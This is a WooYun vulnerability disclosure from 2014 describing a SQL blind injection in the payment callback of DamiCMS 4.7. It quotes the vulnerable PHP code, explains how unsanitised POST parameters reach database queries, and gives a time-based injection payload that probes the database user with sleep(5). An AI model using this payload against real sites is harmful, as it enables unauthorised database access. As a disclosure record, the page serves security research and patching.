当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087989

漏洞标题:大米CMS最新版SQL盲注5绕过防御

相关厂商:damicms.com

漏洞作者: xfkxfk

提交时间:2014-12-24 11:08

修复时间:2015-03-24 11:10

公开时间:2015-03-24 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-24: 细节已通知厂商并且等待厂商处理中
2014-12-24: 厂商已经确认,细节仅向厂商公开
2014-12-27: 细节向第三方安全合作伙伴开放
2015-02-17: 细节向核心白帽子及相关领域专家公开
2015-02-27: 细节向普通白帽子公开
2015-03-09: 细节向实习白帽子公开
2015-03-24: 细节向公众公开

简要描述:

大米CMS最新版4.7,SQL盲注

详细说明:

大米CMS最新版4.7,SQL盲注,绕过防御
文件/Web/Lib/Action/PublicAction.class.php:

//在线充值或在线订单处理
function shouquan(){
$ap_path = (intval(C('AP_TYPE'))==1?'ap_jishi':'ap_danbao');
require_once("./Trade/{$ap_path}/alipay.config.php");
require_once("./Trade/{$ap_path}/lib/alipay_notify.class.php");
//计算得出通知验证结果
$alipayNotify = new AlipayNotify($alipay_config);
$verify_result = $alipayNotify->verifyNotify();
//if($verify_result) {//验证成功
if(!$verify_result) {//假设这里验证成功

//商户订单号WIDout_trade_no
$out_trade_no = $_POST['out_trade_no'];
//支付宝交易号
$trade_no = $_POST['trade_no'];
//交易状态
$trade_status = $_POST['trade_status'];

$total_fee = $_POST['total_fee'];
if($_POST['trade_status'] == 'WAIT_BUYER_PAY') {
//该判断表示买家已在支付宝交易管理中产生了交易记录,但没有付款

//判断该笔订单是否在商户网站中已经做过处理
//如果没有做过处理,根据订单号(out_trade_no)在商户网站的订单系统中查到该笔订单的详细,并执行商户的业务程序
//如果有做过处理,不执行商户的业务程序

M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',0);
logResult('等待买家付款!');
echo "success"; //请不要修改或删除
}
else if($_POST['trade_status'] == 'WAIT_SELLER_SEND_GOODS') {
//该判断表示买家已在支付宝交易管理中产生了交易记录且付款成功,但卖家没有发货
//判断该笔订单是否在商户网站中已经做过处理
//如果没有做过处理,根据订单号(out_trade_no)在商户网站的订单系统中查到该笔订单的详细,并执行商户的业务程序
//如果有做过处理,不执行商户的业务程序
M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',1);
logResult('已付款,等待发货!');
echo "success"; //请不要修改或删除


//调试用,写文本函数记录程序运行情况是否正常
//logResult("这里写入想要调试的代码变量值,或其他运行的结果记录");
}
else if($_POST['trade_status'] == 'WAIT_BUYER_CONFIRM_GOODS') {
//该判断表示卖家已经发了货,但买家还没有做确认收货的操作

//判断该笔订单是否在商户网站中已经做过处理
//如果没有做过处理,根据订单号(out_trade_no)在商户网站的订单系统中查到该笔订单的详细,并执行商户的业务程序
//如果有做过处理,不执行商户的业务程序
M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',2);
logResult('已发货,等待收货!');
echo "success"; //请不要修改或删除
//调试用,写文本函数记录程序运行情况是否正常
//logResult("这里写入想要调试的代码变量值,或其他运行的结果记录");
}
else if($_POST['trade_status'] == 'TRADE_FINISHED' || $_POST['trade_status'] == 'TRADE_SUCCESS') {
M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',3);
$trade_type = substr($out_trade_no,0,2);
if($trade_type == "CZ"){
$arr = explode("-",$out_trade_no);
if(count($arr)==2){
$uid = intval($arr[1]);
if($uid>0){
M('member')->where('uid='.$uid)->setInc('money',$total_fee);
//logResult(M('dami_common_member',null)->getLastSql().'<BR>');
$data['uid'] =$uid;
$data['addtime'] = time();
$data['price'] =$total_fee;
$data['trade_no'] = $out_trade_no;
$data['remark'] = "用户充值";
$data['log_type'] = 0;
M('money_log')->add($data);
//logResult(M('money_log')->getLastSql().'<BR>');
}
}
}
//退款退货相关
else if($_POST['refund_status'] == 'WAIT_SELLER_AGREE'){
M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',7);
}
else if($_POST['refund_status'] == 'WAIT_BUYER_RETURN_GOODS'){
M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',8);
}
else if($_POST['refund_status'] == 'REFUND_SUCCESS'){
M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',9);

}
else if($_POST['trade_status'] == 'TRADE_CLOSED'){
M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',10);
}
else{
logResult($out_trade_no.'<BR>');
}
//该判断表示买家已经确认收货,这笔交易完成

//判断该笔订单是否在商户网站中已经做过处理
//如果没有做过处理,根据订单号(out_trade_no)在商户网站的订单系统中查到该笔订单的详细,并执行商户的业务程序
//如果有做过处理,不执行商户的业务程序
logResult('交易完成!');
echo "success"; //请不要修改或删除
//调试用,写文本函数记录程序运行情况是否正常
//logResult("这里写入想要调试的代码变量值,或其他运行的结果记录");
}
else {
//其他状态判断
logResult('其他状态!');
echo "success";
//调试用,写文本函数记录程序运行情况是否正常
//logResult ("这里写入想要调试的代码变量值,或其他运行的结果记录");
}
//——请根据您的业务逻辑来编写程序(以上代码仅作参考)——

/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
}
else {
//验证失败
logResult('验证失败<BR>');
echo "fail";
//调试用,写文本函数记录程序运行情况是否正常
//logResult("这里写入想要调试的代码变量值,或其他运行的结果记录");
}
}


先看这里:

$verify_result = $alipayNotify->verifyNotify();


这里的$verify_result就是在支付时进行验证的结果
正常情况下,使用这里的支付时,这里肯定是验证成功的
所以这里的$verify_result应该是返回True的
所以这里我们假设$verify_result=True
当验证成功后,进入到下面:

$out_trade_no = $_POST['out_trade_no'];
//支付宝交易号
$trade_no = $_POST['trade_no'];
//交易状态
$trade_status = $_POST['trade_status'];
$total_fee = $_POST['total_fee'];
if($_POST['trade_status'] == 'WAIT_BUYER_PAY') {
M('member_trade')->where("out_trade_no='{$out_trade_no}' or group_trade_no='{$out_trade_no}'")->setField('status',0);
logResult('等待买家付款!');
echo "success"; //请不要修改或删除
}


POST的内容直接进入了where条件中
在where条件中,字符串是不做处理的,导致sql漏洞产生
继续下面的内容,同样产生大量的sql注入

漏洞证明:

发送请求:

http://localhost/dami/index.php?s=/Public/shouquan.html
out_trade_no=111' %26%26 CASE WHEN(mid((user()) from 1 for 1)=char(114)) THEN sleep(5) ELSE (0) END%23&trade_status=WAIT_BUYER_PAY


这里会延时5秒返回:

1.png


看看数据库执行记录:

2.png

修复方案:

intval

版权声明:转载请注明来源 xfkxfk@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2014-12-24 11:41

厂商回复:

已加强防御 谢谢 到官网下新版

最新状态:

暂无


漏洞评价:

评论

  1. 2014-12-24 11:42 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    这么快就确认了